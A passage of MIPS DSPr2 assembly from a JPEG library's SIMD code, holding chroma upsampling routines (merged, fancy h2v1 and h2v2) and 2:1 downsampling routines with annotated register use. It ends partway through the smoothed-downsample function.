* jsimd_h2v1_extrgb_merged_upsample_dspr2
* jsimd_h2v1_extrgbx_merged_upsample_dspr2
* jsimd_h2v1_extbgr_merged_upsample_dspr2
* jsimd_h2v1_extbgrx_merged_upsample_dspr2
* jsimd_h2v1_extxbgr_merged_upsample_dspr2
* jsimd_h2v1_extxrgb_merged_upsample_dspr2
*
* Merged h2v1 upsample routines
*/
/*
 * Generator macro: emits one h2v1 merged-upsample routine per extended
 * pixel format.  Each chroma sample is shared by two horizontally adjacent
 * Y samples, so the main loop emits two pixels per iteration on a single
 * output row.  Offsets are relative to a two-pixel group.
 */
.macro GENERATE_H2V1_MERGED_UPSAMPLE_DSPR2 colorid, pixel_size, \
                                           r1_offs, g1_offs, \
                                           b1_offs, a1_offs, \
                                           r2_offs, g2_offs, \
                                           b2_offs, a2_offs
/* Store two adjacent pixels and advance outptr by one 2-pixel group. */
.macro STORE_H2V1_2_PIXELS scratch0 scratch1 scratch2 scratch3 scratch4 \
                           scratch5 outptr
    sb        \scratch0, \r1_offs(\outptr)
    sb        \scratch1, \g1_offs(\outptr)
    sb        \scratch2, \b1_offs(\outptr)
    sb        \scratch3, \r2_offs(\outptr)
    sb        \scratch4, \g2_offs(\outptr)
    sb        \scratch5, \b2_offs(\outptr)
.if (\pixel_size == 8)
    li        t0, 0xFF          /* opaque alpha for 4-byte-per-pixel formats */
    sb        t0, \a1_offs(\outptr)
    sb        t0, \a2_offs(\outptr)
.endif
    addiu     \outptr, \pixel_size
.endm
/* Store a single trailing pixel (odd output_width); outptr not advanced. */
.macro STORE_H2V1_1_PIXEL scratch0 scratch1 scratch2 outptr
    sb        \scratch0, \r1_offs(\outptr)
    sb        \scratch1, \g1_offs(\outptr)
    sb        \scratch2, \b1_offs(\outptr)
.if (\pixel_size == 8)
    li        t0, 0xFF
    sb        t0, \a1_offs(\outptr)
.endif
.endm
LEAF_DSPR2(jsimd_h2v1_\colorid\()_merged_upsample_dspr2)
/*
 * a0 = cinfo->output_width
 * a1 = input_buf
 * a2 = in_row_group_ctr
 * a3 = output_buf
 * 16(sp) = range_limit
 *
 * t8 points at the range-limit table ("addu reg, t8, val; lbu" = clamped
 * lookup).  FIX() constants are synthesized via addiu/xori chains.
 * NOTE: the instruction after each branch executes in the delay slot.
 */
    SAVE_REGS_ON_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, ra
    li        t0, 0xe6ea
    lw        t1, 0(a1)         /* t1 = input_buf[0] */
    lw        t2, 4(a1)         /* t2 = input_buf[1] */
    lw        t3, 8(a1)         /* t3 = input_buf[2] */
    lw        t8, 56(sp)        /* t8 = range_limit */
    addiu     s1, t0, 0x7fff    /* s1 = 0x166e9 [FIX(1.40200)] */
    addiu     s2, s1, 0x5eb9    /* s2 = 0x1c5a2 [FIX(1.77200)] */
    addiu     s0, t0, 0x9916    /* s0 = 0x8000 (0xe6ea + sext(0x9916)) */
    addiu     s4, zero, 0xa7e6  /* s4 = 0xffffa7e6 [-FIX(0.34414)] */
    xori      s3, s4, 0xeec8    /* s3 = 0xffff492e [-FIX(0.71414)] */
    srl       t0, a0, 1
    sll       t4, a2, 2
    lwx       s5, t4(t1)        /* s5 = inptr0 */
    lwx       s6, t4(t2)        /* s6 = inptr1 */
    lwx       s7, t4(t3)        /* s7 = inptr2 */
    lw        t7, 0(a3)         /* t7 = outptr */
    blez      t0, 2f            /* output_width < 2: single column only */
    addu      t9, s6, t0        /* t9 = end address (delay slot) */
1:
    lbu       t2, 0(s6)         /* t2 = cb */
    lbu       t0, 0(s7)         /* t0 = cr */
    lbu       t1, 0(s5)         /* t1 = y */
    addiu     t2, t2, -128      /* t2 = cb - 128 */
    addiu     t0, t0, -128      /* t0 = cr - 128 */
    mult      $ac1, s4, t2
    madd      $ac1, s3, t0
    sll       t0, t0, 15
    sll       t2, t2, 15
    mulq_rs.w t0, s1, t0        /* t0 = (C1*cr + ONE_HALF)>> SCALEBITS */
    extr_r.w  t5, $ac1, 16      /* t5 = green chroma term */
    mulq_rs.w t6, s2, t2        /* t6 = (C2*cb + ONE_HALF)>> SCALEBITS */
    addiu     s7, s7, 1
    addiu     s6, s6, 1
    addu      t2, t1, t0        /* t2 = y + cred */
    addu      t3, t1, t5        /* t3 = y + cgreen */
    addu      t4, t1, t6        /* t4 = y + cblue */
    addu      t2, t8, t2
    addu      t3, t8, t3
    addu      t4, t8, t4
    lbu       t1, 1(s5)         /* y of the odd column */
    lbu       v0, 0(t2)         /* range-limit lookups, even pixel */
    lbu       v1, 0(t3)
    lbu       ra, 0(t4)
    addu      t2, t1, t0
    addu      t3, t1, t5
    addu      t4, t1, t6
    addu      t2, t8, t2
    addu      t3, t8, t3
    addu      t4, t8, t4
    lbu       t2, 0(t2)         /* range-limit lookups, odd pixel */
    lbu       t3, 0(t3)
    lbu       t4, 0(t4)
    STORE_H2V1_2_PIXELS v0, v1, ra, t2, t3, t4, t7
    bne       t9, s6, 1b
    addiu     s5, s5, 2         /* delay slot */
2:
    andi      t0, a0, 1
    beqz      t0, 4f            /* even width: done */
    nop
3:
    /* odd output_width: emit the last column from the final chroma pair */
    lbu       t2, 0(s6)
    lbu       t0, 0(s7)
    lbu       t1, 0(s5)
    addiu     t2, t2, -128      /* (cb - 128) */
    addiu     t0, t0, -128      /* (cr - 128) */
    mul       t3, s4, t2
    mul       t4, s3, t0
    sll       t0, t0, 15
    sll       t2, t2, 15
    mulq_rs.w t0, s1, t0        /* (C1*cr + ONE_HALF)>> SCALEBITS */
    mulq_rs.w t6, s2, t2        /* (C2*cb + ONE_HALF)>> SCALEBITS */
    addu      t3, t3, s0        /* + ONE_HALF (s0 = 0x8000) */
    addu      t3, t4, t3
    sra       t5, t3, 16        /* (C4*cb + ONE_HALF + C3*cr)>> SCALEBITS */
    addu      t2, t1, t0        /* y + cred */
    addu      t3, t1, t5        /* y + cgreen */
    addu      t4, t1, t6        /* y + cblue */
    addu      t2, t8, t2
    addu      t3, t8, t3
    addu      t4, t8, t4
    lbu       t2, 0(t2)
    lbu       t3, 0(t3)
    lbu       t4, 0(t4)
    STORE_H2V1_1_PIXEL t2, t3, t4, t7
4:
    RESTORE_REGS_FROM_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, ra
    j         ra
    nop
END(jsimd_h2v1_\colorid\()_merged_upsample_dspr2)
.purgem STORE_H2V1_1_PIXEL
.purgem STORE_H2V1_2_PIXELS
.endm
/*------------------------------------id -- pix R1 G1 B1 A1 R2 G2 B2 A2 */
GENERATE_H2V1_MERGED_UPSAMPLE_DSPR2 extrgb,  6, 0, 1, 2, 6, 3, 4, 5, 6
GENERATE_H2V1_MERGED_UPSAMPLE_DSPR2 extbgr,  6, 2, 1, 0, 3, 5, 4, 3, 6
GENERATE_H2V1_MERGED_UPSAMPLE_DSPR2 extrgbx, 8, 0, 1, 2, 3, 4, 5, 6, 7
GENERATE_H2V1_MERGED_UPSAMPLE_DSPR2 extbgrx, 8, 2, 1, 0, 3, 6, 5, 4, 7
GENERATE_H2V1_MERGED_UPSAMPLE_DSPR2 extxbgr, 8, 3, 2, 1, 0, 7, 6, 5, 4
GENERATE_H2V1_MERGED_UPSAMPLE_DSPR2 extxrgb, 8, 1, 2, 3, 0, 5, 6, 7, 4
/*****************************************************************************/
/*
* jsimd_h2v2_fancy_upsample_dspr2
*
* Fancy processing for the common case of 2:1 horizontal and 2:1 vertical.
*/
LEAF_DSPR2(jsimd_h2v2_fancy_upsample_dspr2)
/*
 * a0 = cinfo->max_v_samp_factor
 * a1 = downsampled_width
 * a2 = input_data
 * a3 = output_data_ptr
 *
 * Triangular-filter (3:1 weighted) 2x2 upsample.  For each input row pair,
 * column sums thiscolsum (t7) / nextcolsum (t6) are carried across loop
 * iterations; the first/last columns are special-cased (duplicated edge).
 * t9 counts the two output rows produced per input row.
 * NOTE: the instruction after each branch executes in the delay slot.
 */
    SAVE_REGS_ON_STACK 24, s0, s1, s2, s3, s4, s5
    li        s4, 0             /* s4 = output row counter * 4 */
    lw        s2, 0(a3)         /* s2 = *output_data_ptr */
0:
    li        t9, 2             /* two output rows per input row */
    lw        s1, -4(a2)        /* s1 = inptr1 (row above on first pass) */
1:
    lw        s0, 0(a2)         /* s0 = inptr0 */
    lwx       s3, s4(s2)        /* s3 = outptr */
    addiu     s5, a1, -2        /* s5 = downsampled_width - 2 */
    srl       t4, s5, 1
    sll       t4, t4, 1         /* t4 = (width-2) & ~1: 2-aligned columns */
    lbu       t0, 0(s0)
    lbu       t1, 1(s0)
    lbu       t2, 0(s1)
    lbu       t3, 1(s1)
    addiu     s0, 2
    addiu     s1, 2
    addu      t8, s0, t4        /* t8 = end address */
    andi      s5, s5, 1         /* s5 = residual */
    sll       t4, t0, 1
    sll       t6, t1, 1
    addu      t0, t0, t4        /* t0 = (*inptr0++) * 3 */
    addu      t1, t1, t6        /* t1 = (*inptr0++) * 3 */
    addu      t7, t0, t2        /* t7 = thiscolsum */
    addu      t6, t1, t3        /* t6 = nextcolsum */
    sll       t0, t7, 2         /* t0 = thiscolsum * 4 */
    subu      t1, t0, t7        /* t1 = thiscolsum * 3 */
    shra_r.w  t0, t0, 4         /* first output col: (4*this + 8) >> 4 */
    addiu     t1, 7
    addu      t1, t1, t6
    srl       t1, t1, 4         /* (3*this + next + 7) >> 4 */
    sb        t0, 0(s3)
    sb        t1, 1(s3)
    beq       t8, s0, 22f       /* skip to final iteration if width == 3 */
    addiu     s3, 2             /* delay slot */
2:
    /* main loop: two input columns -> four output bytes per iteration */
    lh        t0, 0(s0)         /* t0 = A3|A2 */
    lh        t2, 0(s1)         /* t2 = B3|B2 */
    addiu     s0, 2
    addiu     s1, 2
    preceu.ph.qbr t0, t0        /* t0 = 0|A3|0|A2 */
    preceu.ph.qbr t2, t2        /* t2 = 0|B3|0|B2 */
    shll.ph   t1, t0, 1
    sll       t3, t6, 1
    addu.ph   t0, t1, t0        /* t0 = A3*3|A2*3 */
    addu      t3, t3, t6        /* t3 = this * 3 */
    addu.ph   t0, t0, t2        /* t0 = next2|next1 */
    addu      t1, t3, t7
    andi      t7, t0, 0xFFFF    /* t7 = next1 */
    sll       t2, t7, 1
    addu      t2, t7, t2        /* t2 = next1*3 */
    addu      t4, t2, t6
    srl       t6, t0, 16        /* t6 = next2 */
    shra_r.w  t1, t1, 4         /* t1 = (this*3 + last + 8) >> 4 */
    addu      t0, t3, t7
    addiu     t0, 7
    srl       t0, t0, 4         /* t0 = (this*3 + next1 + 7) >> 4 */
    shra_r.w  t4, t4, 4         /* t4 = (next1*3 + this + 8) >> 4 */
    addu      t2, t2, t6
    addiu     t2, 7
    srl       t2, t2, 4         /* t2 = (next1*3 + next2 + 7) >> 4 */
    sb        t1, 0(s3)
    sb        t0, 1(s3)
    sb        t4, 2(s3)
    sb        t2, 3(s3)
    bne       t8, s0, 2b
    addiu     s3, 4             /* delay slot */
22:
    beqz      s5, 4f            /* no residual column */
    addu      t8, s0, s5        /* delay slot */
3:
    /* one residual input column */
    lbu       t0, 0(s0)
    lbu       t2, 0(s1)
    addiu     s0, 1
    addiu     s1, 1
    sll       t3, t6, 1
    sll       t1, t0, 1
    addu      t1, t0, t1        /* t1 = inptr0 * 3 */
    addu      t3, t3, t6        /* t3 = thiscolsum * 3 */
    addu      t5, t1, t2
    addu      t1, t3, t7
    shra_r.w  t1, t1, 4
    addu      t0, t3, t5
    addiu     t0, 7
    srl       t0, t0, 4
    sb        t1, 0(s3)
    sb        t0, 1(s3)
    addiu     s3, 2
    move      t7, t6            /* slide column sums forward */
    bne       t8, s0, 3b
    move      t6, t5            /* delay slot */
4:
    /* last column: duplicate the edge sample */
    sll       t0, t6, 2         /* t0 = thiscolsum * 4 */
    subu      t1, t0, t6        /* t1 = thiscolsum * 3 */
    addu      t1, t1, t7
    addiu     s4, 4             /* next output row */
    shra_r.w  t1, t1, 4
    addiu     t0, 7
    srl       t0, t0, 4
    sb        t1, 0(s3)
    sb        t0, 1(s3)
    addiu     t9, -1
    addiu     s3, 2
    bnez      t9, 1b            /* second output row of this input row */
    lw        s1, 4(a2)         /* inptr1 = row below (delay slot) */
    srl       t0, s4, 2
    subu      t0, a0, t0
    bgtz      t0, 0b            /* more input rows */
    addiu     a2, 4             /* delay slot */
    RESTORE_REGS_FROM_STACK 24, s0, s1, s2, s3, s4, s5
    j         ra
    nop
END(jsimd_h2v2_fancy_upsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_h2v1_fancy_upsample_dspr2)
/*
 * a0 = cinfo->max_v_samp_factor
 * a1 = downsampled_width
 * a2 = input_data
 * a3 = output_data_ptr
 *
 * Triangular-filter 2x1 upsample: each input pixel yields two outputs,
 * (3*this + neighbor + 1or2) >> 2, with duplicated first/last columns.
 * Main loop (label 1) processes 4 input pixels at a time using packed
 * halfword DSP ops on unaligned loads (ulw/ulh/usw).
 * NOTE: the instruction after each branch executes in the delay slot.
 */
    SAVE_REGS_ON_STACK 16, s0, s1, s2, s3
    .set at                     /* allow assembler use of $at */
    beqz      a0, 3f            /* no rows */
    sll       t0, a0, 2         /* delay slot */
    lw        s1, 0(a3)
    li        s3, 0x10001       /* packed +1|+1 rounding constant */
    addu      s0, s1, t0        /* s0 = end of output row pointers */
0:
    addiu     t8, a1, -2
    srl       t9, t8, 2         /* t9 = 4-pixel group count */
    lw        t7, 0(a2)         /* t7 = inptr */
    lw        s2, 0(s1)         /* s2 = outptr */
    lbu       t0, 0(t7)
    lbu       t1, 1(t7)         /* t1 = inptr[1] */
    sll       t2, t0, 1
    addu      t2, t2, t0        /* t2 = invalue*3 */
    addu      t2, t2, t1
    shra_r.w  t2, t2, 2
    sb        t0, 0(s2)         /* first output = edge pixel duplicated */
    sb        t2, 1(s2)
    beqz      t9, 11f           /* width too small for the 4-wide loop */
    addiu     s2, 2             /* delay slot */
1:
    /* 4 input pixels -> 8 output pixels, packed halfword arithmetic */
    ulw       t0, 0(t7)         /* t0 = |P3|P2|P1|P0| */
    ulw       t1, 1(t7)
    ulh       t2, 4(t7)         /* t2 = |0|0|P5|P4| */
    preceu.ph.qbl t3, t0        /* t3 = |0|P3|0|P2| */
    preceu.ph.qbr t0, t0        /* t0 = |0|P1|0|P0| */
    preceu.ph.qbr t2, t2        /* t2 = |0|P5|0|P4| */
    preceu.ph.qbl t4, t1        /* t4 = |0|P4|0|P3| */
    preceu.ph.qbr t1, t1        /* t1 = |0|P2|0|P1| */
    shll.ph   t5, t4, 1
    shll.ph   t6, t1, 1
    addu.ph   t5, t5, t4        /* t5 = |P4*3|P3*3| */
    addu.ph   t6, t6, t1        /* t6 = |P2*3|P1*3| */
    addu.ph   t4, t3, s3        /* left-neighbor terms, +1 rounding */
    addu.ph   t0, t0, s3
    addu.ph   t4, t4, t5
    addu.ph   t0, t0, t6
    shrl.ph   t4, t4, 2         /* t4 = |0|P3|0|P2| */
    shrl.ph   t0, t0, 2         /* t0 = |0|P1|0|P0| */
    addu.ph   t2, t2, t5        /* right-neighbor terms, round-to-nearest */
    addu.ph   t3, t3, t6
    shra_r.ph t2, t2, 2         /* t2 = |0|P5|0|P4| */
    shra_r.ph t3, t3, 2         /* t3 = |0|P3|0|P2| */
    shll.ph   t2, t2, 8
    shll.ph   t3, t3, 8
    or        t2, t4, t2        /* interleave left/right results */
    or        t3, t3, t0
    addiu     t9, -1
    usw       t3, 0(s2)
    usw       t2, 4(s2)
    addiu     s2, 8
    bgtz      t9, 1b
    addiu     t7, 4             /* delay slot */
11:
    andi      t8, 3             /* t8 = residual pixel count */
    beqz      t8, 22f
    addiu     t7, 1             /* delay slot */
2:
    /* one residual input pixel -> two outputs */
    lbu       t0, 0(t7)
    addiu     t7, 1
    sll       t1, t0, 1
    addu      t2, t0, t1        /* t2 = invalue*3 */
    lbu       t3, -2(t7)        /* left neighbor */
    lbu       t4, 0(t7)         /* right neighbor */
    addiu     t3, 1             /* rounding: +1 left, +2 right */
    addiu     t4, 2
    addu      t3, t3, t2
    addu      t4, t4, t2
    srl       t3, 2
    srl       t4, 2
    sb        t3, 0(s2)
    sb        t4, 1(s2)
    addiu     t8, -1
    bgtz      t8, 2b
    addiu     s2, 2             /* delay slot */
22:
    /* last column: duplicate the edge pixel */
    lbu       t0, 0(t7)
    lbu       t2, -1(t7)
    sll       t1, t0, 1
    addu      t1, t1, t0        /* t1 = invalue * 3 */
    addu      t1, t1, t2
    addiu     t1, 1
    srl       t1, t1, 2
    sb        t1, 0(s2)
    sb        t0, 1(s2)
    addiu     s1, 4
    bne       s1, s0, 0b        /* next row */
    addiu     a2, 4             /* delay slot */
3:
    RESTORE_REGS_FROM_STACK 16, s0, s1, s2, s3
    j         ra
    nop
END(jsimd_h2v1_fancy_upsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_h2v1_downsample_dspr2)
/*
 * a0 = cinfo->image_width
 * a1 = cinfo->max_v_samp_factor
 * a2 = compptr->v_samp_factor
 * a3 = compptr->width_in_blocks
 * 16(sp) = input_data
 * 20(sp) = output_data
 *
 * 2:1 horizontal downsample: averages pixel pairs with an alternating
 * 0/1 bias (s3), then pads the output row up to width_in_blocks*DCTSIZE
 * by replicating the last pixel value (loop 4).
 * NOTE: the instruction after each branch executes in the delay slot.
 */
    .set at                     /* allow assembler use of $at (lbux) */
    SAVE_REGS_ON_STACK 24, s0, s1, s2, s3, s4
    beqz      a2, 7f            /* no component rows */
    lw        s1, 44(sp)        /* s1 = output_data (delay slot) */
    lw        s0, 40(sp)        /* s0 = input_data */
    srl       s2, a0, 2
    andi      t9, a0, 2
    srl       t7, t9, 1
    addu      s2, t7, s2
    sll       t0, a3, 3         /* t0 = width_in_blocks*DCT */
    srl       t7, t0, 1
    subu      s2, t7, s2        /* s2 = output columns to pad */
0:
    andi      t6, a0, 1         /* t6 = temp_index */
    addiu     t6, -1            /* offset of last valid input byte */
    lw        t4, 0(s1)         /* t4 = outptr */
    lw        t5, 0(s0)         /* t5 = inptr0 */
    li        s3, 0             /* s3 = bias */
    srl       t7, a0, 1         /* t7 = image_width1 */
    srl       s4, t7, 2         /* s4 = 4-output-pixel group count */
    andi      t8, t7, 3         /* t8 = residual output pixels */
1:
    /* 8 input pixels -> 4 output pixels; bias alternates 0,1,0,1 */
    ulhu      t0, 0(t5)
    ulhu      t1, 2(t5)
    ulhu      t2, 4(t5)
    ulhu      t3, 6(t5)
    raddu.w.qb t0, t0           /* sum of the two bytes */
    raddu.w.qb t1, t1
    raddu.w.qb t2, t2
    raddu.w.qb t3, t3
    shra.ph   t0, t0, 1         /* truncate (bias 0) */
    shra_r.ph t1, t1, 1         /* round (bias 1) */
    shra.ph   t2, t2, 1
    shra_r.ph t3, t3, 1
    sb        t0, 0(t4)
    sb        t1, 1(t4)
    sb        t2, 2(t4)
    sb        t3, 3(t4)
    addiu     s4, -1
    addiu     t4, 4
    bgtz      s4, 1b
    addiu     t5, 8             /* delay slot */
    beqz      t8, 3f
    addu      s4, t4, t8        /* delay slot */
2:
    /* residual pixel pairs, one output at a time */
    ulhu      t0, 0(t5)
    raddu.w.qb t0, t0
    addqh.w   t0, t0, s3        /* (sum + bias) >> 1 */
    xori      s3, s3, 1         /* toggle bias */
    sb        t0, 0(t4)
    addiu     t4, 1
    bne       t4, s4, 2b
    addiu     t5, 2             /* delay slot */
3:
    /* expand_right_edge: replicate the final pixel value */
    lbux      t1, t6(t5)        /* last valid input byte */
    sll       t1, 1             /* doubled so odd-width uses same formula */
    addqh.w   t2, t1, s3        /* t2 = pixval1 */
    xori      s3, s3, 1
    addqh.w   t3, t1, s3        /* t3 = pixval2 */
    blez      s2, 5f            /* no padding needed */
    append    t3, t2, 8         /* pack pixval1|pixval2 (delay slot) */
    addu      t5, t4, s2        /* t5 = loop_end2 */
4:
    ush       t3, 0(t4)         /* store padding pairs */
    addiu     s2, -1
    bgtz      s2, 4b
    addiu     t4, 2             /* delay slot */
5:
    beqz      t9, 6f            /* odd half-width: one extra padding byte */
    nop
    sb        t2, 0(t4)
6:
    addiu     s1, 4             /* next output row */
    addiu     a2, -1
    bnez      a2, 0b
    addiu     s0, 4             /* next input row (delay slot) */
7:
    RESTORE_REGS_FROM_STACK 24, s0, s1, s2, s3, s4
    j         ra
    nop
END(jsimd_h2v1_downsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_h2v2_downsample_dspr2)
/*
 * a0 = cinfo->image_width
 * a1 = cinfo->max_v_samp_factor
 * a2 = compptr->v_samp_factor
 * a3 = compptr->width_in_blocks
 * 16(sp) = input_data
 * 20(sp) = output_data
 *
 * 2:2 downsample: averages each 2x2 input block with an alternating 1/2
 * bias (s6), then pads the output row to width_in_blocks*DCTSIZE by
 * replicating the last pixel value (loop 5).
 * NOTE: the instruction after each branch executes in the delay slot.
 */
    .set at                     /* allow assembler use of $at (lbux) */
    SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
    beqz      a2, 8f            /* no component rows */
    lw        s1, 52(sp)        /* s1 = output_data (delay slot) */
    lw        s0, 48(sp)        /* s0 = input_data */
    andi      t6, a0, 1         /* t6 = temp_index */
    addiu     t6, -1            /* offset of last valid input byte */
    srl       t7, a0, 1         /* t7 = image_width1 */
    srl       s4, t7, 2         /* s4 = 4-output-pixel group count */
    andi      t8, t7, 3         /* t8 = residual output pixels */
    andi      t9, a0, 2
    srl       s2, a0, 2
    srl       t7, t9, 1
    addu      s2, t7, s2
    sll       t0, a3, 3         /* t0 = width_in_blocks*DCT */
    srl       t7, t0, 1
    subu      s2, t7, s2        /* s2 = output columns to pad */
0:
    lw        t4, 0(s1)         /* t4 = outptr */
    lw        t5, 0(s0)         /* t5 = inptr0 */
    lw        s7, 4(s0)         /* s7 = inptr1 */
    li        s6, 1             /* s6 = bias (alternates 1,2) */
2:
    /* 2x8 input block -> 4 output pixels */
    ulw       t0, 0(t5)         /* t0 = |P3|P2|P1|P0| */
    ulw       t1, 0(s7)         /* t1 = |Q3|Q2|Q1|Q0| */
    ulw       t2, 4(t5)
    ulw       t3, 4(s7)
    precrq.ph.w t7, t0, t1      /* t7 = |P3|P2|Q3|Q2| */
    ins       t0, t1, 16, 16    /* t0 = |Q1|Q0|P1|P0| */
    raddu.w.qb t1, t7           /* 2x2 block sums */
    raddu.w.qb t0, t0
    shra_r.w  t1, t1, 2         /* (sum + 2) >> 2 */
    addiu     t0, 1             /* (sum + 1) >> 2 */
    srl       t0, 2
    precrq.ph.w t7, t2, t3
    ins       t2, t3, 16, 16
    raddu.w.qb t7, t7
    raddu.w.qb t2, t2
    shra_r.w  t7, t7, 2
    addiu     t2, 1
    srl       t2, 2
    sb        t0, 0(t4)
    sb        t1, 1(t4)
    sb        t2, 2(t4)
    sb        t7, 3(t4)
    addiu     t4, 4
    addiu     t5, 8
    addiu     s4, s4, -1
    bgtz      s4, 2b
    addiu     s7, 8             /* delay slot */
    beqz      t8, 4f
    addu      t8, t4, t8        /* delay slot */
3:
    /* residual 2x2 blocks, one output at a time */
    ulhu      t0, 0(t5)
    ulhu      t1, 0(s7)
    ins       t0, t1, 16, 16
    raddu.w.qb t0, t0
    addu      t0, t0, s6        /* + bias */
    srl       t0, 2
    xori      s6, s6, 3         /* toggle bias 1 <-> 2 */
    sb        t0, 0(t4)
    addiu     t5, 2
    addiu     t4, 1
    bne       t8, t4, 3b
    addiu     s7, 2             /* delay slot */
4:
    /* expand_right_edge: replicate the final pixel value */
    lbux      t1, t6(t5)        /* last valid byte of inptr0 */
    sll       t1, 1
    lbux      t0, t6(s7)        /* last valid byte of inptr1 */
    sll       t0, 1
    addu      t1, t1, t0        /* doubled 2x2 sum for the edge column */
    addu      t3, t1, s6
    srl       t0, t3, 2         /* t0 = pixval1 */
    xori      s6, s6, 3
    addu      t2, t1, s6
    srl       t1, t2, 2         /* t1 = pixval2 */
    blez      s2, 6f            /* no padding needed */
    append    t1, t0, 8         /* pack pixval1|pixval2 (delay slot) */
5:
    ush       t1, 0(t4)         /* store padding pairs */
    addiu     s2, -1
    bgtz      s2, 5b
    addiu     t4, 2             /* delay slot */
6:
    beqz      t9, 7f            /* odd half-width: one extra padding byte */
    nop
    sb        t0, 0(t4)
7:
    addiu     s1, 4             /* next output row */
    addiu     a2, -1
    bnez      a2, 0b
    addiu     s0, 8             /* skip two input rows (delay slot) */
8:
    RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
    j         ra
    nop
END(jsimd_h2v2_downsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_h2v2_smooth_downsample_dspr2)
/*
 * a0 = input_data
 * a1 = output_data
 * a2 = compptr->v_samp_factor
 * a3 = cinfo->max_v_samp_factor
 * 16(sp) = cinfo->smoothing_factor
 * 20(sp) = compptr->width_in_blocks
 * 24(sp) = cinfo->image_width
 *
 * Smoothed 2:2 downsample: each output pixel is a weighted blend of its
 * 2x2 input block (weight t6 = 16384 - 80*SF) and the ring of 12
 * neighboring input pixels (weight t7 = 16*SF), accumulated in $ac1 and
 * rounded by extr_r.w ..., 16.
 *
 * Layout of one output row pass (label 3):
 *   - first column special case (column -1 treated as column 0),
 *   - short loop 4 for (output_cols-2) % 4 columns,
 *   - unrolled-by-4 loop 5 for the remaining aligned columns,
 *   - last column special case after loop 5.
 * The prologue (labels 0..2) pads each input row, including the border
 * rows at input_data[-1] and input_data[max_v], out to output_cols*2 by
 * replicating the last pixel, so the neighbor reads never run past data.
 * NOTE: the instruction after each branch executes in the delay slot.
 */
    .set at
    SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
    lw        s7, 52(sp)        /* compptr->width_in_blocks */
    lw        s0, 56(sp)        /* cinfo->image_width */
    lw        s6, 48(sp)        /* cinfo->smoothing_factor */
    sll       s7, 3             /* output_cols = width_in_blocks * DCTSIZE */
    sll       v0, s7, 1
    subu      v0, v0, s0        /* v0 = bytes of right padding per row */
    blez      v0, 2f
    move      v1, zero          /* v1 = row counter (delay slot) */
    addiu     t0, a3, 2         /* t0 = cinfo->max_v_samp_factor + 2 */
0:
    addiu     t1, a0, -4        /* start at input_data[-1] (border row) */
    sll       t2, v1, 2
    lwx       t1, t2(t1)
    move      t3, v0
    addu      t1, t1, s0        /* t1 = end of valid pixels in this row */
    lbu       t2, -1(t1)        /* value to replicate */
1:
    addiu     t3, t3, -1
    sb        t2, 0(t1)
    bgtz      t3, 1b
    addiu     t1, t1, 1         /* delay slot */
    addiu     v1, v1, 1
    bne       v1, t0, 0b
    nop
2:
    li        v0, 80
    mul       v0, s6, v0
    li        v1, 16384
    move      t4, zero          /* t4 = outrow */
    move      t5, zero          /* t5 = inrow index */
    subu      t6, v1, v0        /* t6 = 16384 - tmp_smoot_f * 80 */
    sll       t7, s6, 4         /* t7 = tmp_smoot_f * 16 */
3:
    /* Special case for first column: pretend column -1 is same as column 0 */
    sll       v0, t4, 2
    lwx       t8, v0(a1)        /* outptr = output_data[outrow] */
    sll       v1, t5, 2
    addiu     t9, v1, 4
    addiu     s0, v1, -4
    addiu     s1, v1, 8
    lwx       s2, v1(a0)        /* inptr0 = input_data[inrow] */
    lwx       t9, t9(a0)        /* inptr1 = input_data[inrow+1] */
    lwx       s0, s0(a0)        /* above_ptr = input_data[inrow-1] */
    lwx       s1, s1(a0)        /* below_ptr = input_data[inrow+2] */
    lh        v0, 0(s2)
    lh        v1, 0(t9)
    lh        t0, 0(s0)
    lh        t1, 0(s1)
    ins       v0, v1, 16, 16
    ins       t0, t1, 16, 16
    raddu.w.qb t2, v0           /* t2 = 2x2 block sum (membersum) */
    raddu.w.qb s3, t0           /* s3 starts the neighbor sum */
    lbu       v0, 0(s2)         /* column -1 == column 0 for edge */
    lbu       v1, 2(s2)
    lbu       t0, 0(t9)
    lbu       t1, 2(t9)
    addu      v0, v0, v1
    mult      $ac1, t2, t6      /* ac1 = membersum * (16384 - 80*SF) */
    addu      t0, t0, t1
    lbu       t2, 2(s0)
    addu      t0, t0, v0
    lbu       t3, 2(s1)
    addu      s3, t0, s3
    lbu       v0, 0(s0)
    lbu       t0, 0(s1)
    sll       s3, s3, 1         /* side columns count twice vs corners */
    addu      v0, v0, t2
    addu      t0, t0, t3
    addu      t0, t0, v0
    addu      s3, t0, s3
    madd      $ac1, s3, t7      /* + neighborsum * 16*SF */
    extr_r.w  v0, $ac1, 16
    addiu     t8, t8, 1
    addiu     s2, s2, 2
    addiu     t9, t9, 2
    addiu     s0, s0, 2
    addiu     s1, s1, 2
    sb        v0, -1(t8)
    addiu     s4, s7, -2
    and       s4, s4, 3         /* s4 = (output_cols-2) % 4 */
    addu      s5, s4, t8        /* end address */
4:
    /* one middle column per iteration (pre-alignment) */
    lh        v0, 0(s2)
    lh        v1, 0(t9)
    lh        t0, 0(s0)
    lh        t1, 0(s1)
    ins       v0, v1, 16, 16
    ins       t0, t1, 16, 16
    raddu.w.qb t2, v0
    raddu.w.qb s3, t0
    lbu       v0, -1(s2)
    lbu       v1, 2(s2)
    lbu       t0, -1(t9)
    lbu       t1, 2(t9)
    addu      v0, v0, v1
    mult      $ac1, t2, t6
    addu      t0, t0, t1
    lbu       t2, 2(s0)
    addu      t0, t0, v0
    lbu       t3, 2(s1)
    addu      s3, t0, s3
    lbu       v0, -1(s0)
    lbu       t0, -1(s1)
    sll       s3, s3, 1
    addu      v0, v0, t2
    addu      t0, t0, t3
    addu      t0, t0, v0
    addu      s3, t0, s3
    madd      $ac1, s3, t7
    extr_r.w  t2, $ac1, 16
    addiu     t8, t8, 1
    addiu     s2, s2, 2
    addiu     t9, t9, 2
    addiu     s0, s0, 2
    sb        t2, -1(t8)
    bne       s5, t8, 4b
    addiu     s1, s1, 2         /* delay slot */
    addiu     s5, s7, -2
    subu      s5, s5, s4
